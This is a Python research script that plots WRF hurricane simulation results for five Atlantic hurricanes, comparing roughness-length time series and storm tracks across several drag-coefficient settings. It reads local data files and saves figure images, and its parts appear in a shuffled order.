    with open(dir_znt_eyewall[kk], mode='r') as csv_file:
        csv_reader = csv.DictReader(csv_file)
        line_count = 0
        for row in csv_reader:
            if line_count == 0:
                # NOTE(review): nested same-quote f-string requires Python 3.12+ (PEP 701).
                print(f'Column names are {', '.join(row)}')
                Times.append(list(row.keys()))
                line_count += 1
            #print(row)
            # NOTE(review): the first data row is appended to values as well,
            # and line_count is incremented twice for it - confirm intended.
            rows.append(row)
            values.append(list(row.values()))
            line_count += 1
        print(f'Processed {line_count} lines.')
    Times0=Times[0]  # CSV column names, used as the time axis
    print(Times0)
    print(values[0])
    print(position[kk])
    ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
                              position2[kk][2]:position2[kk][3]])
    # Panel label '(a)', '(b)', ...
    ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
            size=30, **csfont)
    for i in range(0,line_count-1):
        if i==0:
            #tmp=[float(i)*0.5144444 for i in values[i]]
            # NOTE(review): the comprehension variable i shadows the loop index.
            tmp=[float(i) for i in values[i]]
        # elif (i!=2 and i!=3):
        else:
            tmp=[float(i) for i in values[i]]
        # else:
        #     continue
        # Katrina and Dorian have shorter usable records; trim their series.
        if hurricanes[kk]=='Katrina':
            plt.plot( Times0[:5], tmp[:5], color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        elif hurricanes[kk]=='Dorian':
            plt.plot( Times0[:-2], tmp[:-2], color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        else:
            plt.plot( Times0, tmp, color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        c+=1
    # Thicken the subplot frame and tick marks.
    for axis in ['top','bottom','left','right']:
        ax.spines[axis].set_linewidth(2)
    ax.tick_params(length=5, width=2)
    # NOTE(review): the figure-level legend is re-added on every iteration.
    fig.legend(models, bbox_to_anchor=(0.87, 0.42), prop=font, \
               frameon=False)
    if kk==0 or kk==3:
        plt.ylabel(r'$Z_0$ (m)', **csfont, fontsize=30)
    if kk==2 or kk==3 or kk==4:
        plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
    plt.title(hurricanes[kk], {'size': 30}, **csfont)
# Saved once after the loop; file name carries the last hurricane's name.
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_ZNT_eyewall.png', dpi=500)
plt.show()
########################
# Plot hurricane track #
########################
# One map panel per hurricane: observed best track plus the simulated Clz
# tracks, drawn over a cartopy background image in the WRF projection.
fig = plt.figure(figsize=(15,10))
spec = mpl.gridspec.GridSpec(ncols=6, nrows=2)
for kk in range(len(hurricanes)):
    # cons = number of leading track points to draw for this hurricane
    # (Katrina/Dorian have shorter usable records).
    if hurricanes[kk]=='Katrina':
        cons=6
    elif hurricanes[kk]=='Dorian':
        cons=8
    else:
        cons=10
    real1=[]
    oussama1=[]
    wrf1=[]
    simu1=[]
    # The track file holds back-to-back JSON objects; insert commas and wrap
    # in brackets so the whole file parses as one JSON array.
    with open( dir_wt[kk], 'r' ) as f :
        data0 = f.read()
        data = json.loads('[' + data0.replace('}{', '},{') + ']')
        for i in range(0,len(data)):
            data2 = list(data[i].values())
            data3 = [e for sl in data2 for e in sl]
            for j in range(len(data3)):
                # Drop each point's leading field, keeping the coordinate pair
                # (presumably [lat, lon] - TODO confirm against the producer).
                data3[j].pop(0)
            # First object is the observed track, the rest are simulations.
            if i==0:
                real1.append(data3)
            # elif i==1:
            #     oussama1.append(data3)
            # elif i==2:
            #     wrf1.append(data3)
            else:
                simu1.append(data3)
    real1 = np.array(real1, dtype=np.float32)
    simu1 = np.array(simu1, dtype=np.float32)
    real_r = np.radians(real1)
    simu_r = np.radians(simu1)
    # Haversine great-circle distance between simulated and observed tracks.
    term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
    term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
          np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
          np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
    # NOTE(review): simu_error1 is computed but never used in this loop.
    simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
    # ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]])
    # ax.text(0.05, 0.9, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
    # size=30)
    # Load the pickled WRF field only to recover lat/lon and the projection.
    slp2D = pickle.load( open( dir_p[kk], "rb" ) )
    lats, lons = latlon_coords(slp2D)
    # Get the cartopy mapping object (use original data, rather than any processed data)
    cart_proj = get_cartopy(slp2D)
    # Set the GeoAxes to the projection used by WRF
    #ax = plt.axes(projection=cart_proj)
    ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]], projection=cart_proj)
    # ax.stock_img()
    # Download and add the states and coastlines
    states = NaturalEarthFeature(category="cultural", scale="50m",
                                 facecolor="none",
                                 name="admin_1_states_provinces_shp")
    ax.add_feature(states, linewidth=.5, edgecolor="black")
    ax.coastlines('50m', linewidth=0.8)
    # Set the map bounds
    # ax.set_xlim(cartopy_xlim(slp2D))
    # ax.set_ylim(cartopy_ylim(slp2D))
    ax.set_extent(lat_log_bound[kk])
    # 'SR' background image comes from CARTOPY_USER_BACKGROUNDS (set above).
    ax.background_img(name='SR', resolution='high')
    # Show grid lines.
    gl = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True,
                      linewidth=1.5, color='gray', alpha=0.8, linestyle=':')
    gl.xlabel_style = {'size': 15, 'color': 'k','fontname':'Times New Roman'}
    gl.ylabel_style = {'size': 15, 'color': 'k','fontname':'Times New Roman'}
    gl.xlabels_top = False
    gl.ylabels_right = False
    c=0  # series counter: indexes colors/markers/linestyles per curve
    ll=[]
    rr=[]
    # Observed track: first cons points, component 0 -> ll, component 1 -> rr.
    for i in range(real1.shape[0]):
        for j in range(real1.shape[1]):
            if j<cons:
                ll.append(real1[i][j][0])
                rr.append(real1[i][j][1])
        ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, \
                 linestyle=list(linestyles.values())[c],\
                 markersize=sizes[c], transform=crs.PlateCarree())
        c+=1
        ll=[]
        rr=[]
    # Simulated tracks, one curve per Clz run.
    for i in range(simu1.shape[0]):
        for j in range(simu1.shape[1]):
            if j<cons:
                ll.append(simu1[i][j][0])
                rr.append(simu1[i][j][1])
        ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, \
                 linestyle=list(linestyles.values())[c],\
                 markersize=sizes[c], transform=crs.PlateCarree())
        c+=1
        ll=[]
        rr=[]
    for axis in ['top','bottom','left','right']:
        ax.spines[axis].set_linewidth(15)
    # NOTE(review): the figure-level legend is re-added on every iteration.
    fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font_wt, \
               frameon=False)
    plt.title(hurricanes[kk], {'size': 25}, **csfont)
    # plt.legend(['Real track','C0.0001', 'C0.01', 'C1', 'C100'],\
    # loc = "upper right", prop={'size': 7})
    # plt.xlabel("Lon", fontsize=135)
    # plt.ylabel("Lat", fontsize=135)
    # plt.title(hurricanes[kk], {'size': 35}, **csfont)
    # plt.show()
    # Saved inside the loop: one PNG per hurricane.
    plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wt.png', dpi=500)
plt.show()
# fig = plt.figure(figsize=(15,10))
# spec = mpl.gridspec.GridSpec(ncols=6, nrows=2)
# for kk in range(len(hurricanes)):
# real1=[]
# oussama1=[]
# wrf1=[]
# simu1=[]
# with open( dir_wt[kk], 'r' ) as f :
# data0 = f.read()
# data = json.loads('[' + data0.replace('}{', '},{') + ']')
# for i in range(0,len(data)):
# data2 = list(data[i].values())
# data3 = [e for sl in data2 for e in sl]
# for j in range(len(data3)):
# data3[j].pop(0)
# if i==0:
# real1.append(data3)
# # elif i==1:
# # oussama1.append(data3)
# # elif i==2:
# # wrf1.append(data3)
# else:
# simu1.append(data3)
# real1 = np.array(real1, dtype=np.float32)
# simu1 = np.array(simu1, dtype=np.float32)
# real_r = np.radians(real1)
# simu_r = np.radians(simu1)
# term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
# term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
# simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# m = Basemap(projection='merc', llcrnrlat=lat_log_bound[kk][2],\
# urcrnrlat=lat_log_bound[kk][3], \
# llcrnrlon=lat_log_bound[kk][0], \
# urcrnrlon=lat_log_bound[kk][1], resolution= 'f' )
# m.drawstates()
# m.drawmeridians([-100, -90, -80, -70, -60, -50, -40, ], color='k', textcolor='k', linewidth=1.5,
# zorder=None, dashes=[6, 1000], labels=[1, 0, 0, 1], labelstyle=None, fmt='%g', xoffset=None,
# yoffset=None, ax=None, latmax=None, fontsize=12)
# m.drawparallels([10, 15, 20, 25, 30, 35], color='k', textcolor='k', linewidth=1.5, zorder=None, dashes=[6, 1000],
# labels=[1, 0, 0, 1], labelstyle=None, fmt='%g', xoffset=None, yoffset=None, ax=None, latmax=None, fontsize=12)
# m.drawmapscale(-101, 8, -96, 8, 1000, barstyle='fancy', units='km', fontsize=8)
# m.drawcoastlines(linewidth=0.7, linestyle='solid', color='grey')
# m.drawcountries()
# m.shadedrelief()
# m.drawmapboundary()
# # ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]])
# # ax.text(0.05, 0.9, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
# # size=30)
# slp2D = pickle.load( open( dir_p[kk], "rb" ) )
# lats, lons = latlon_coords(slp2D)
# # Get the cartopy mapping object (use original data, rather than any processed data)
# cart_proj = get_cartopy(slp2D)
# # Set the GeoAxes to the projection used by WRF
# #ax = plt.axes(projection=cart_proj)
# ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]], projection=cart_proj)
# ax.stock_img()
# # Download and add the states and coastlines
# states = NaturalEarthFeature(category="cultural", scale="50m",
# facecolor="none",
# name="admin_1_states_provinces_shp")
# ax.add_feature(states, linewidth=.5, edgecolor="black")
# ax.coastlines('50m', linewidth=0.8)
# # Set the map bounds
# # ax.set_xlim(cartopy_xlim(slp2D))
# # ax.set_ylim(cartopy_ylim(slp2D))
# ax.set_extent(lat_log_bound[kk])
# # Show grid lines.
# gl = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True,
# linewidth=1.5, color='gray', alpha=0.8, linestyle=':')
# gl.xlabel_style = {'size': 15, 'color': 'k'}
# gl.ylabel_style = {'size': 15, 'color': 'k'}
# gl.xlabels_top = False
# gl.ylabels_right = False
# c=0
# ll=[]
# rr=[]
# for i in range(real1.shape[0]):
# for j in range(real1.shape[1]):
# if j<6:
# ll.append(real1[i][j][0])
# rr.append(real1[i][j][1])
# ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, linestyle=patterns[c],\
# markersize=sizes[c], transform=crs.PlateCarree())
# c+=1
# ll=[]
# rr=[]
# for i in range(simu1.shape[0]):
# for j in range(simu1.shape[1]):
# if j<6:
# ll.append(simu1[i][j][0])
# rr.append(simu1[i][j][1])
# ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, linestyle=patterns[c],\
# markersize=sizes[c], transform=crs.PlateCarree())
# c+=1
# ll=[]
# rr=[]
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_linewidth(15)
# fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font_wt, \
# frameon=False)
# plt.title(hurricanes[kk], {'size': 25}, **csfont)
# # plt.legend(['Real track','C0.0001', 'C0.01', 'C1', 'C100'],\
# # loc = "upper right", prop={'size': 7})
# # plt.xlabel("Lon", fontsize=135)
# # plt.ylabel("Lat", fontsize=135)
# # plt.title(hurricanes[kk], {'size': 35}, **csfont)
# # plt.show()
# plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wt.png', dpi=500)
# plt.show()
# ###################
# # Plot error bars #
# ###################
# simu_error = []
# for kk in range(len(hurricanes)):
# rows1=[]
# Times1=[]
# Times1=[]
# values1=[]
# real1_track=[]
# with open(dir_wi[kk], mode='r') as csv_file:
# csv_reader = csv.DictReader(csv_file)
# line_count = 0
# sim_count = 0
# for row in csv_reader:
# if line_count == 0:
# print(f'Column names are {', '.join(row)}')
# Times1.append(list(row.keys()))
# real1_track.append(list(row.values()))
# line_count += 1
# else:
# rows1.append(row)
# values1.append(list(row.values()))
# line_count += 1
# print('There is totally ',(line_count-1)*(len(row)),' data points')
# simu1=np.array(values1, dtype=np.float32)
# real1=np.array(real1_track, dtype=np.float32)
# real1=real1*0.5144444
# real1=real1
# simu_error1=abs(simu1-real1[:,None])/real1[:,None]#/((line_count-3)*(len(row)))
# print('absolute pressure error')
# print(abs(simu1-real1[:,None]))
# simu_error.append(simu_error1)
# par1_error_wi=np.zeros((4, 9))
# par2_error_wi=np.zeros((4, 9))
# par3_erro_wir=np.zeros((4, 9))
# par4_error_wi=np.zeros((4, 9))
# simu_error1 = simu_error[0]
# simu_error2 = simu_error[1]
# simu_error3 = simu_error[2]
# simu_error4 = simu_error[3]
# simu_error5 = simu_error[4]
# par1_error_wi=np.concatenate((simu_error1[0][0][0:5],simu_error2[0][0][:],\
# simu_error3[0][0][:],simu_error4[0][0][:-2],simu_error5[0][0][:]))
# par1_error_wi=par1_error_wi.flatten()
# par1_error_wi_mean=np.mean(par1_error_wi)
# par1_error_wi_std=np.std(par1_error_wi)
# par1_error_wi_low=np.percentile(par1_error_wi, 20)
# par1_error_wi_hgh=np.percentile(par1_error_wi, 80)
# par2_error_wi=np.concatenate((simu_error1[0][1][0:5],simu_error2[0][1][:],\
# simu_error3[0][1][:],simu_error4[0][1][:-2],simu_error5[0][1][:]))
# par2_error_wi=par2_error_wi.flatten()
# par2_error_wi_mean=np.mean(par2_error_wi)
# par2_error_wi_std=np.std(par2_error_wi)
# par2_error_wi_low=np.percentile(par2_error_wi, 20)
# par2_error_wi_hgh=np.percentile(par2_error_wi, 80)
# par3_error_wi=np.concatenate((simu_error1[0][2][0:5],simu_error2[0][2][:],\
# simu_error3[0][2][:],simu_error4[0][2][:-2],simu_error5[0][2][:]))
# par3_error_wi=par3_error_wi.flatten()
# par3_error_wi_mean=np.mean(par3_error_wi)
# par3_error_wi_std=np.std(par3_error_wi)
# par3_error_wi_low=np.percentile(par3_error_wi, 20)
# par3_error_wi_hgh=np.percentile(par3_error_wi, 80)
# par4_error_wi=np.concatenate((simu_error1[0][3][0:5],simu_error2[0][3][:],\
# simu_error3[0][3][:],simu_error4[0][3][:-2],simu_error5[0][3][:]))
# par4_error_wi=par4_error_wi.flatten()
# par4_error_wi_mean=np.mean(par4_error_wi)
# par4_error_wi_std=np.std(par4_error_wi)
# par4_error_wi_low=np.percentile(par4_error_wi, 20)
# par4_error_wi_hgh=np.percentile(par4_error_wi, 80)
# simu_error = []
# for kk in range(len(hurricanes)):
# real1=[]
# oussama1=[]
# wrf1=[]
# simu1=[]
# with open( dir_wt[kk], 'r' ) as f :
# data0 = f.read()
# data = json.loads('[' + data0.replace('}{', '},{') + ']')
# for i in range(0,len(data)):
# data2 = list(data[i].values())
# data3 = [e for sl in data2 for e in sl]
# for j in range(len(data3)):
# data3[j].pop(0)
# if i==0:
# real1.append(data3)
# # elif i==1:
# # oussama1.append(data3)
# # elif i==2:
# # wrf1.append(data3)
# else:
# simu1.append(data3)
# real1 = np.array(real1, dtype=np.float32)
# simu1 = np.array(simu1, dtype=np.float32)
# real_r = np.radians(real1)
# simu_r = np.radians(simu1)
# term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
# term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
# simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# simu_error.append(simu_error1)
# par1_error=np.zeros((4, 9))
# par2_error=np.zeros((4, 9))
# par3_error=np.zeros((4, 9))
# par4_error=np.zeros((4, 9))
# simu_error1 = simu_error[0]
# simu_error2 = simu_error[1]
# simu_error3 = simu_error[2]
# simu_error4 = simu_error[3]
# simu_error5 = simu_error[4]
# par1_error_wt=np.concatenate((simu_error1[0][0:5],\
# simu_error2[0][:],simu_error3[0][:],\
# simu_error4[0][:-2],simu_error5[0][:]))
# par1_error_wt=par1_error_wt.flatten()
# par1_error_wt_mean=np.mean(par1_error_wt)
# par1_error_wt_std=np.std(par1_error_wt)
# par1_error_wt_low=np.percentile(par1_error_wt, 20)
# par1_error_wt_hgh=np.percentile(par1_error_wt, 80)
# par2_error_wt=np.concatenate((simu_error1[1][0:5],\
# simu_error2[1][:],simu_error3[1][:],\
# simu_error4[1][:-2],simu_error5[1][:]))
# par2_error_wt=par2_error_wt.flatten()
# par2_error_wt_mean=np.mean(par2_error_wt)
# par2_error_wt_std=np.std(par2_error_wt)
# par2_error_wt_low=np.percentile(par2_error_wt, 20)
# par2_error_wt_hgh=np.percentile(par2_error_wt, 80)
# par3_error_wt=np.concatenate((simu_error1[2][0:5],\
# simu_error2[2][:],simu_error3[2][:],\
# simu_error4[2][:-2],simu_error5[2][:]))
# par3_error_wt=par3_error_wt.flatten()
# par3_error_wt_mean=np.mean(par3_error_wt)
# par3_error_wt_std=np.std(par3_error_wt)
# par3_error_wt_low=np.percentile(par2_error_wt, 20)
# par3_error_wt_hgh=np.percentile(par2_error_wt, 80)
# par4_error_wt=np.concatenate((simu_error1[3][0:5],\
# simu_error2[3][:],simu_error3[3][:],\
# simu_error4[3][:-2],simu_error5[3][:]))
# par4_error_wt=par4_error_wt.flatten()
# par4_error_wt_mean=np.mean(par4_error_wt)
# par4_error_wt_std=np.std(par4_error_wt)
# par4_error_wt_low=np.percentile(par4_error_wt, 20)
# par4_error_wt_hgh=np.percentile(par4_error_wt, 80)
# print(par4_error_wt_low, par4_error_wt_mean, par4_error_wt_hgh)
# x_pos = np.arange(len(models))
# CTEs_wi = [par1_error_wi_mean,\
# par2_error_wi_mean,par3_error_wi_mean,par4_error_wi_mean]
# errors_wi = [par1_error_wi_std,\
# par2_error_wi_std,par3_error_wi_std,par4_error_wi_std]
# percentile_10_wi = np.array([par1_error_wi_mean-par1_error_wi_low,\
# par2_error_wi_mean-par2_error_wi_low,par3_error_wi_mean-par3_error_wi_low, \
# par4_error_wi_mean-par4_error_wi_low])
# percentile_90_wi = np.array([par1_error_wi_hgh-par1_error_wi_mean,\
# par2_error_wi_hgh-par2_error_wi_mean,par3_error_wi_hgh-par3_error_wi_mean, \
# par4_error_wi_hgh-par4_error_wi_mean])
# err_wi = np.vstack((percentile_10_wi, percentile_90_wi))
# CTEs_wt = [par1_error_wt_mean,\
# par2_error_wt_mean,par3_error_wt_mean,par4_error_wt_mean]
# errors_wt = [par1_error_wt_std,\
# par2_error_wt_std,par3_error_wt_std,par4_error_wt_std]
# percentile_10_wt = np.array([par1_error_wt_mean-par1_error_wt_low,\
# par2_error_wt_mean-par2_error_wt_low,par3_error_wt_mean-par3_error_wt_low, \
# par4_error_wt_mean-par4_error_wt_low])
# percentile_90_wt = np.array([par1_error_wt_hgh-par1_error_wt_mean,\
# par2_error_wt_hgh-par2_error_wt_mean,par3_error_wt_hgh-par3_error_wt_mean, \
# par4_error_wt_hgh-par4_error_wt_mean])
# print(percentile_90_wt)
# err_wt = np.vstack((percentile_10_wt, percentile_90_wt))
# # fig, ax = plt.subplots(1, 2, figsize=(40, 8), sharex=True)
# fig = plt.figure(figsize=(8,5))
# spec = mpl.gridspec.GridSpec(ncols=8, nrows=5)
# ax = fig.add_subplot(spec[1:,0:4])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[0]+')', transform=ax.transAxes,
# size=15, **csfont)
# bars = ax.bar(x_pos, CTEs_wi, yerr=err_wi, align='center', \
# color=['blue','cyan','gray', 'red'], alpha=0.8,\
# ecolor='k', capsize=10, edgecolor='k', linewidth=3)
# for i in range(len(x_pos)):
# bars[i].set(linestyle=list(linestyles.values())[0])
# ax.set_ylabel(r'Normalized Intensity', **csfont, fontsize=15)
# vals = ax.get_yticks()
# ax.set_yticklabels(['{:,.0%}'.format(x) for x in vals])
# ax.set_xticks(x_pos)
# ax.set_xticklabels(models, **csfont, fontsize=10)
# #ax.set_title(r'COAWST', **csfont, fontsize=20)
# ax.yaxis.grid(True)
# ax = fig.add_subplot(spec[1:,4:])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[1]+')', transform=ax.transAxes,
# size=15, **csfont)
# bars = ax.bar(x_pos, CTEs_wt, yerr=err_wt, align='center', \
# color=['blue','cyan','gray', 'red'], alpha=0.8,\
# ecolor='k', capsize=10, edgecolor='k', linewidth=3)
# for i in range(len(x_pos)):
# bars[i].set(linestyle=list(linestyles.values())[0])
# ax.set_ylabel(r'Track Error (km)', **csfont, fontsize=15)
# vals = ax.get_yticks()
# ax.set_yticklabels(['{}'.format(x) for x in vals])
# ax.set_xticks(x_pos)
# ax.set_xticklabels(models, **csfont, fontsize=10)
# #ax.set_title(r'COAWST', **csfont, fontsize=20)
# ax.yaxis.grid(True)
# ax = fig.add_subplot(spec[0,0:])
# handles = [plt.Rectangle((0,0),1,1, facecolor=colors[i+1], \
# linestyle=list(linestyles.values())[0], edgecolor = 'k', linewidth=1.5\
# ) for i in range(len(models))]
# plt.legend(handles, models, ncol=4, bbox_to_anchor=(0.9, 0.8), prop=fontbar, \
# frameon=False)
# ax.axes.xaxis.set_visible(False)
# ax.axes.yaxis.set_visible(False)
# ax.set_yticks([])
# ax.set_yticklabels([])
# ax.set_xticks([])
# ax.set_xticklabels([])
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_visible(False)
# # for i, v in enumerate(CTEs):
# # ax.text(i, v+0.02, str(round(v, 3)), color='red', fontweight='bold')
# # Save the figure and show
# fig.autofmt_xdate()
# plt.tight_layout()
# #plt.savefig('wind_intensity_bar_plot.png')
# plt.savefig('C:/Users/limgr/Desktop/wi_wt_bar_plots.png', dpi=500)
# plt.show()
| import csv
import matplotlib.pyplot as plt
import numpy as np
from collections import OrderedDict
import matplotlib as mpl
# import matplotlib.gridspec as gridspec
from matplotlib.ticker import MaxNLocator
from matplotlib.ticker import StrMethodFormatter
import matplotlib.font_manager as font_manager
from matplotlib.patches import Patch
import string
from netCDF4 import Dataset
import json
from cartopy.feature import NaturalEarthFeature
import cartopy.crs as crs
import pickle
from wrf import (to_np, getvar, smooth2d, get_cartopy, cartopy_xlim,
cartopy_ylim, latlon_coords)
import cartopy
import os
from PIL import Image
Image.MAX_IMAGE_PIXELS = None
map_location = "C:/Users/limgr/.spyder-py3/Map"
os.environ["CARTOPY_USER_BACKGROUNDS"] = map_location
# List the colors that will be used for tracing the track.
csfont = {'fontname':'Times New Roman'}
font = font_manager.FontProperties(family='Times New Roman', size=30)
fontbar = font_manager.FontProperties(family='Times New Roman', size=12)
font_wt = font_manager.FontProperties(family='Times New Roman', size=20)
colors = ['k','blue','cyan','gray', 'red', \
'blue', 'cyan', 'lightcoral', 'turquoise','red','blue','green','pink']
patterns = ['-', '--','-.','-',':',':','--','--', ':','-', '--', ':','-', '--', ':',\
'-.', '-.', '-.', ':', '--', '-']
markers = ['s','D','^','o','*','s','+','x','X','D','^','<','>','v']
sizes = [7, 7, 7, 7, 7, 3, 4, 3, 3, 3, 3, 3, 6,5,4,3,2,2]
options = ["Best Track",\
"Clz=0.0001",\
"Clz=0.01",\
"Clz=1",\
"Clz=100"]
models = ["Clz = 0.0001",\
"Clz = 0.01",\
"Clz = 1",\
"Clz = 100"]
hurricanes = ["Katrina",\
"Maria",\
"Irma",\
"Dorian",\
"Lorenzo"]
# subplot positions
position = [[0,0,2],[0,2,4],[0,4,6],[1,0,2],[1,2,4]]
position2 = [[0,4,0,7],[0,4,8,15],[0,4,16,23],[5,9,0,7],[5,9,8,15]]
linestyles = OrderedDict(
[('solid', (0, ())),
('dashdotted', (0, (3, 3, 1, 3))),
('dashdotdotted', (0, (3, 2, 1, 2, 1, 2))),
('dashed', (0, (3, 3))),
('dotted', (0, (1, 3))),
('dashed', (0, (3, 3))),
('loosely dotted', (0, (1, 10))),
('densely dotted', (0, (1, 1))),
('loosely dashed', (0, (5, 10))),
('densely dashed', (0, (5, 1))),
('loosely dashdotted', (0, (3, 10, 1, 10))),
('densely dashdotted', (0, (3, 1, 1, 1))),
('loosely dashdotdotted', (0, (3, 10, 1, 10, 1, 10))),
('densely dashdotdotted', (0, (3, 1, 1, 1, 1, 1)))])
R = 6373.0 # approxiamte radius of earth in km
# folder for wi and wt files
dir_wi = ['C:/Users/limgr/Desktop/Katrina_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Maria_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Irma_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_wind_intensity_16km.csv']
dir_wt = ['C:/Users/limgr/Desktop/Katrina_track_16km.txt',\
'C:/Users/limgr/Desktop/Maria_track_16km.txt',\
'C:/Users/limgr/Desktop/Irma_track_16km.txt',\
'C:/Users/limgr/Desktop/Dorian_track_16km.txt',\
'C:/Users/limgr/Desktop/Lorenzo_track_16km.txt']
dir_p = ['C:/Users/limgr/Desktop/Katrina_16km.p',\
'C:/Users/limgr/Desktop/Maria_16km.p',\
'C:/Users/limgr/Desktop/Irma_16km.p',\
'C:/Users/limgr/Desktop/Dorian_16km.p',\
'C:/Users/limgr/Desktop/Lorenzo_16km.p']
dir_znt_eye = ['C:/Users/limgr/Desktop/Katrina_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Maria_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Irma_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_ZNT_eye_16km.csv']
dir_znt_eyewall = ['C:/Users/limgr/Desktop/Katrina_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Maria_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Irma_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_ZNT_eyewall_16km.csv']
dir_wp = ['C:/Users/limgr/Desktop/Katrina_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Maria_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Irma_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Dorian_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Lorenzo_avg_speed_16km.csv']
lat_log_bound = [[-90.5, -84.5, 23, 29],\
[-74, -68, 19.5, 25.5],\
[-47, -39, 14, 22],\
[-76.5, -70.5, 23, 29],\
[-45.5, -39.5, 16.5, 22.5]]
lat_log_bound = [[-93, -83, 24, 34],\
[-77, -67, 19, 29],\
[-51, -39, 14, 22],\
[-80, -69, 23, 29],\
[-47, -40, 16.5, 25.5]]
lat_log_bound = [[-91, -85, 24, 30],\
[-77, -67, 19, 29],\
[-51, -39, 14, 22],\
[-78, -70, 23, 29],\
[-47, -40, 16.5, 25.5]]
# lat_log_bound = [[-92, -86, 25, 30],\
# [-74, -68, 21.5, 25.5],\
# [-46, -43.5, 17, 19.5],\
# [-76, -73.5, 25.5, 28],\
# [-46, -42, 19, 23]]
def Calculate_Distance_Haversine1(x):
    """First haversine term, sin^2(dlat / 2).

    *x* is a (dlat, dlon) pair in radians (typically a row of the
    element-wise difference of two radian coordinate arrays); only the
    first component is used.
    """
    half_dlat = x[0] / 2
    return np.sin(half_dlat) ** 2
def Calculate_Distance_Haversine2(x):
    """Cosine factor of the haversine formula.

    *x* is a (lat, lon) pair in radians; returns cos(lat), i.e. the
    cosine of the first component.
    """
    lat = x[0]
    return np.cos(lat)
def Calculate_Distance_Haversine3(x):
    """Second haversine term, sin^2(dlon / 2).

    *x* is a (dlat, dlon) pair in radians; only the second component
    (the longitude difference) is used.
    """
    half_dlon = x[1] / 2
    return np.sin(half_dlon) ** 2
#########################################
# Plot normalized intensity time series #
#########################################
# One panel per hurricane. Row 0 of each CSV is the observed intensity
# (in knots, converted to m/s); every later row is one simulated run.
# Depends on names defined earlier in the file: hurricanes, dir_wi,
# position, position2, colors, sizes, linestyles, options, font, csfont.
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
    c=0
    rows=[]
    Times=[]
    Times=[]  # NOTE(review): duplicate of the line above; harmless
    values=[]
    # Read the CSV: the header supplies the time axis (Times), each row one series.
    with open(dir_wi[kk], mode='r') as csv_file:
        csv_reader = csv.DictReader(csv_file)
        line_count = 0
        for row in csv_reader:
            if line_count == 0:
                print(f'Column names are {", ".join(row)}')
